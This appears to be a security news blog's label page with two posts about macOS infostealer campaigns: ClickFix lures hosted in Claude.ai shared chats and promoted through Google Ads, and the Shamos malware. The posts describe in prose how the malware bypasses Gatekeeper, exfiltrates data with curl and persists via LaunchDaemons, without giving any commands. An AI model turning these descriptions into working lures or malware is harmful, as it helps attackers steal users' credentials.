Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Mac Users. Show all posts
Vulnerabilities and Exploits
Claude AI Google Ads Mac Users User Security Vulnerabilities and Exploits

Hackers Abuse Google Ads and Claude.ai Chats to Spread Mac Malware

 

Cybercriminals are once again abusing trust, and this time they are combining Google Ads with Claude.ai shared chats to push malware onto Mac users. The campaign targets people searching for terms like “Claude mac download,” where sponsored results appear to point to the legitimate claude.ai domain but actually lead to malicious installation instructions. Security researcher Berk Albayrak first identified the scheme, and confirmed that attackers are using the tactic in active campaigns. 

The attack works because it looks believable at first glance. Users click a sponsored search result, land on a public Claude chat, and see what appears to be an official “Claude Code on Mac” guide, sometimes even attributed to Apple Support. That page then tells them to open Terminal and paste a command. Instead of installing useful software, the command quietly downloads and runs malware on the victim’s Mac.

What makes the operation especially dangerous is the way it blends legitimate services with deception. The ad itself can show the real claude.ai domain, which helps the link look safe, while the malicious instructions are hidden inside Claude’s shared chat feature. In some variants, the payload is linked to MacSync-style infostealer behavior, aimed at harvesting browser credentials, cookies, and Keychain data. Researchers also reported that multiple malicious chats were being used, showing that the operators are testing and rotating infrastructure. 

The campaign is a strong reminder that search results and AI platforms are not automatically trustworthy just because they appear familiar. Attackers increasingly rely on “clickfix” tactics, where the victim is convinced to copy and run a command manually, bypassing many traditional download warnings. That user action becomes the infection point, making the social engineering as important as the malware itself.

Mac users should avoid sponsored search results when looking for software downloads and instead go directly to the official site by typing the address themselves. Any chat, guide, or support page that instructs users to paste Terminal commands should be treated with caution, especially if it claims to come from Apple or a well-known AI service. The broader lesson is simple: when an instruction asks you to run code on your own computer, pause and verify before acting.
Read more »
Shamos
ClickFix Attacks Cookie Spider Infostealer Mac Users malware Shamos

New Shamos Malware Targets Mac Users Through Fake Tech Support Sites

 

Cybersecurity researchers have unearthed a new Mac-targeting malware called Shamos that deceives users through fake troubleshooting guides and repair solutions. This information-stealing malware, developed by the cybercriminal organization "COOKIE SPIDER," represents a variant of the previously known Atomic macOS Stealer (AMOS).

Modus operandi

The malware spreads through ClickFix attacks, which utilize malicious advertisements and counterfeit GitHub repositories to trick victims. Attackers create deceptive websites such as mac-safer[.]com and rescue-mac[.]com that appear to offer legitimate macOS problem-solving assistance. These sites instruct users to copy and paste Terminal commands that supposedly fix common system issues. 

However, these commands actually decode Base64-encoded URLs and retrieve malicious Bash scripts from remote servers. The scripts capture user passwords, download the Shamos executable, and use system tools like 'xattr' and 'chmod' to bypass Apple's Gatekeeper security feature. 

Data theft capabilities

Once installed, Shamos performs comprehensive data collection targeting multiple sensitive areas. The malware searches for cryptocurrency wallet files, Keychain credentials, Apple Notes content, and browser-stored information. It employs anti-virtual machine commands to avoid detection in security sandboxes and uses AppleScript for system reconnaissance.

All stolen data gets compressed into an archive file named 'out.zip' before transmission to the attackers via curl commands. When operating with administrator privileges, Shamos establishes persistence by creating a Plist file in the LaunchDaemons directory, ensuring automatic execution during system startup. 

CrowdStrike's monitoring has detected Shamos attempting infections across more than 300 environments globally since June 2025. The security firm has also observed instances where attackers deployed additional malicious components, including fake Ledger Live cryptocurrency applications and botnet modules. 

Safety measures

Security experts strongly advise Mac users to avoid executing any online commands they don't fully understand. Users should be particularly cautious with GitHub repositories, as the platform hosts numerous malicious projects designed to infect unsuspecting individuals.

For legitimate macOS assistance, users should bypass sponsored search results and instead consult Apple Community forums or the built-in Help system (Cmd + Space → "Help"). ClickFix attacks have proven highly effective across various platforms, appearing in TikTok videos, fake captchas, and bogus Google Meet error messages, making user awareness crucial for prevention.
Read more »
Subscribe to: Posts (Atom)